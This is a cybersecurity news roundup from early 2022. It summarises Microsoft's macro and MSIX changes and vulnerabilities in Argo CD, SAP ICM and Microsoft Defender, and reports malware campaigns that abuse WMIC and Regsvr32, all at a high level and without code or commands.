Microsoft disables macros and MSIX to prevent malware distribution
Microsoft has been actively mobilising against multiple malware attacks that use some of its technologies as an entry vector. The products affected in particular are the Office suite and the MSIX application installers that allow developers to distribute applications for different platforms. In the case of Office, the company will disable Visual Basic for Applications (VBA) macros by default in all its products, including Word, Excel, PowerPoint, Access and Visio, for documents downloaded from the web, although they can be enabled voluntarily by the user. According to Microsoft’s own publication, enabling macros in an Office file allows threat actors to deliver malicious payloads, deploy malware, compromise accounts, exfiltrate information and even gain remote access to targeted systems. The move comes just a month after the Windows vendor disabled Excel 4.0 (XLM) macros by default, another feature that is widely abused to distribute malware. Regarding MSIX application installers, Microsoft has announced that it will temporarily disable the MSIX ms-appinstaller protocol driver in Windows after evidence of active exploitation of vulnerability CVE-2021-43890, which allows the installation of unauthorised applications and is being used to deliver malware such as Emotet, TrickBot and Bazaloader. This move means that, until Microsoft fully fixes the bug, App Installer will not be able to install an app directly from a web server, so users must first download the app to their device and then install the package with the app installer.
Possible exfiltration of information due to vulnerability in Argo CD
Researchers at Apiiro have disclosed a vulnerability in Argo CD, a widely used tool for deploying applications in Kubernetes, which could be exploited by attackers in order to obtain sensitive information from different organisations, especially passwords and API Keys. The vulnerability has been catalogued with the identifier CVE-2022-24348 – 7.7 CVSSv3 and consists of a Path-Traversal flaw that could lead to privilege escalation, information disclosure and lateral movement attacks. Exploitation is achieved by loading a YAML file specially crafted for Kubernetes Helm Chart on the target system, as long as you have permission to create and update applications and you know the full path to a file containing a valid YAML. For its part, Argo CD released version 2.3.0-rc4 last Friday, just 5 days after Apiiro researchers alerted them to the bug.
Critical vulnerabilities in SAP products
SAP has released its February security bulletin issuing 22 major updates, including fixes for the Log4j impact, as well as three critical memory corruption vulnerabilities affecting Internet Communication Manager (ICM), a core component of SAP’s business applications. These last three flaws were discovered by SAP’s product security response team, in collaboration with Onapsis Research Labs, who have named them ICMAD” (Internet Communication Manager Advanced Desync). The most critical vulnerability is already patched in SAP Security Note 3123396, identified as CVE-2022-22536 and with a CVSSv3 of 10.0, it would allow an unauthenticated attacker to prepend a victim’s request with arbitrary data and thereby execute functions impersonating the victim. The remaining two bugs have also been patched by SAP in its security advisory 3123427 and correspond to CVE-2022-22532 and CVE-2022-22533 with CVSSv3 of 8.0 and 7.5 respectively. Both of these would also be exploitable by an unauthenticated remote attacker, although they only affect SAP applications running on SAP NetWeaver AS Java. It should be noted that successful exploitation of these vulnerabilities could result in severe impacts such as: theft of confidential information, ransomware and disruption of business processes and operations. SAP recommends applying SAP’s February 2022 security updates as soon as possible, as well as making use of the open source tool provided by Onapsis that identifies whether a system is vulnerable and in need of patching.
Microsoft security updates
Microsoft has fixed a vulnerability in Microsoft Defender antivirus on Windows that allowed attackers to distribute and execute payloads unnoticed by the malware detection engine. The flaw is due to a loosely configured registry key containing the list of locations excluded from Microsoft Defender scanning that was visible to all users. After remediation this is visible only to users with administrator privileges. This security bug affected the latest versions of Windows 10 and would have been fixed with Microsoft’s latest security updates in February. It is also worth noting that Microsoft is removing the Windows Management Instrumentation (WMIC) command line tool, wmic.exe, from the development portal in the latest versions of Windows 11, in favour of Powershell. The removal would only affect the command tool, so WMI is not affected. WMI has been widely exploited by malicious actors and is even considered a LOLBin (living-off-the-land binaries). By removing the WMIC utility, multiple attacks and malware will no longer function properly, as they will no longer be able to execute some commands necessary to carry out their operations, although it is possible that attackers will replace WMIC with new methods.
Cybercriminals exploiting Windows Regsvr32 utility to distribute malware
Researchers at Uptycs have analysed a new campaign in which malicious actors are increasingly abusing a Windows LOLBin known as Regsvr32 to spread malware. LOLBins are legitimate, native utilities commonly used in computing environments that cybercriminals exploit to evade detection by blending in with normal traffic patterns. In this case, Regsvr32 is a Microsoft-signed utility in Windows that allows users to manage code libraries and register DLL files by adding information to the central directory (registry) so that it can be used by Windows and shared between programs. According to Uptycs, the utility is being abused through a technique known as Squiblydoo, where Regsvr32 is used to execute DLLs via COM scriptlets that do not make any changes to the registry. The research adds that malicious use of this utility has been on the rise lately, mainly in the registry of .OCX files hosted in various malicious Microsoft Office documents. Uptycs has analysed up to 500 malware samples that are reportedly being distributed, some of them belonging to Qbot and Lokibot.